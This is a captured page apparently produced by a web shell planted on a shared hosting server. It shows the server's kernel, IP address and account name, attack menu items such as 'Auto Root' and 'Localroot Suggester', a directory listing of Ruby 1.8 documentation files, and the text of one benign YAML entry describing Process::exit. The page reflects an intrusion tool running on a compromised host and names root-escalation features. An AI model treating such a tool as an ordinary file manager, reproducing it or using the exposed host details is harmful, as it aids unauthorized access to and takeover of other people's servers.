Linux server.edchosting.com 4.18.0-553.79.1.lve.el7h.x86_64 #1 SMP Wed Oct 15 16:34:46 UTC 2025 x86_64
LiteSpeed
Server IP : 75.98.162.185 & Your IP : 216.73.216.163
Domains :
Cant Read [ /etc/named.conf ]
User : goons4good
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby18 /
share /
ri /
1.8 /
system /
Process /
Delete
Unzip
Name
Size
Permission
Date
Action
GID
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
Status
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
Sys
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
UID
[ DIR ]
drwxr-xr-x
2023-08-27 00:26
abort-c.yaml
395
B
-rw-r--r--
2023-07-26 09:39
cdesc-Process.yaml
3.85
KB
-rw-r--r--
2023-07-26 09:39
detach-c.yaml
1.91
KB
-rw-r--r--
2023-07-26 09:39
egid%3d-c.yaml
315
B
-rw-r--r--
2023-07-26 09:39
egid-c.yaml
454
B
-rw-r--r--
2023-07-26 09:39
euid%3d-c.yaml
302
B
-rw-r--r--
2023-07-26 09:39
euid-c.yaml
424
B
-rw-r--r--
2023-07-26 09:39
exec-c.yaml
1.22
KB
-rw-r--r--
2023-07-26 09:39
exit%21-c.yaml
421
B
-rw-r--r--
2023-07-26 09:39
exit-c.yaml
1.35
KB
-rw-r--r--
2023-07-26 09:39
fork-c.yaml
1.04
KB
-rw-r--r--
2023-07-26 09:39
getpgid-c.yaml
421
B
-rw-r--r--
2023-07-26 09:39
getpgrp-c.yaml
433
B
-rw-r--r--
2023-07-26 09:39
getpriority-c.yaml
863
B
-rw-r--r--
2023-07-26 09:39
getrlimit-c.yaml
868
B
-rw-r--r--
2023-07-26 09:39
gid%3d-c.yaml
269
B
-rw-r--r--
2023-07-26 09:39
gid-c.yaml
416
B
-rw-r--r--
2023-07-26 09:39
groups%3d-c.yaml
536
B
-rw-r--r--
2023-07-26 09:39
groups-c.yaml
417
B
-rw-r--r--
2023-07-26 09:39
initgroups-c.yaml
837
B
-rw-r--r--
2023-07-26 09:39
kill-c.yaml
963
B
-rw-r--r--
2023-07-26 09:39
maxgroups%3d-c.yaml
330
B
-rw-r--r--
2023-07-26 09:39
maxgroups-c.yaml
399
B
-rw-r--r--
2023-07-26 09:39
pid-c.yaml
368
B
-rw-r--r--
2023-07-26 09:39
ppid-c.yaml
609
B
-rw-r--r--
2023-07-26 09:39
setpgid-c.yaml
366
B
-rw-r--r--
2023-07-26 09:39
setpgrp-c.yaml
299
B
-rw-r--r--
2023-07-26 09:39
setpriority-c.yaml
605
B
-rw-r--r--
2023-07-26 09:39
setrlimit-c.yaml
2.41
KB
-rw-r--r--
2023-07-26 09:39
setsid-c.yaml
457
B
-rw-r--r--
2023-07-26 09:39
times-c.yaml
473
B
-rw-r--r--
2023-07-26 09:39
uid%3d-c.yaml
312
B
-rw-r--r--
2023-07-26 09:39
uid-c.yaml
414
B
-rw-r--r--
2023-07-26 09:39
wait-c.yaml
2.17
KB
-rw-r--r--
2023-07-26 09:39
wait2-c.yaml
772
B
-rw-r--r--
2023-07-26 09:39
waitall-c.yaml
878
B
-rw-r--r--
2023-07-26 09:39
waitpid-c.yaml
2.18
KB
-rw-r--r--
2023-07-26 09:39
waitpid2-c.yaml
778
B
-rw-r--r--
2023-07-26 09:39
Save
Rename
--- !ruby/object:RI::MethodDescription aliases: [] block_params: comment: - !ruby/struct:SM::Flow::P body: Initiates the termination of the Ruby script by raising the <tt>SystemExit</tt> exception. This exception may be caught. The optional parameter is used to return a status code to the invoking environment. - !ruby/struct:SM::Flow::VERB body: " begin\n exit\n puts "never get here"\n rescue SystemExit\n puts "rescued a SystemExit exception"\n end\n puts "after begin block"\n" - !ruby/struct:SM::Flow::P body: <em>produces:</em> - !ruby/struct:SM::Flow::VERB body: " rescued a SystemExit exception\n after begin block\n" - !ruby/struct:SM::Flow::P body: Just prior to termination, Ruby executes any <tt>at_exit</tt> functions (see Kernel::at_exit) and runs any object finalizers (see ObjectSpace::define_finalizer). - !ruby/struct:SM::Flow::VERB body: " at_exit { puts "at_exit function" }\n ObjectSpace.define_finalizer("string", proc { puts "in finalizer" })\n exit\n" - !ruby/struct:SM::Flow::P body: <em>produces:</em> - !ruby/struct:SM::Flow::VERB body: " at_exit function\n in finalizer\n" full_name: Process::exit is_singleton: true name: exit params: | exit(integer=0) Kernel::exit(integer=0) Process::exit(integer=0) visibility: public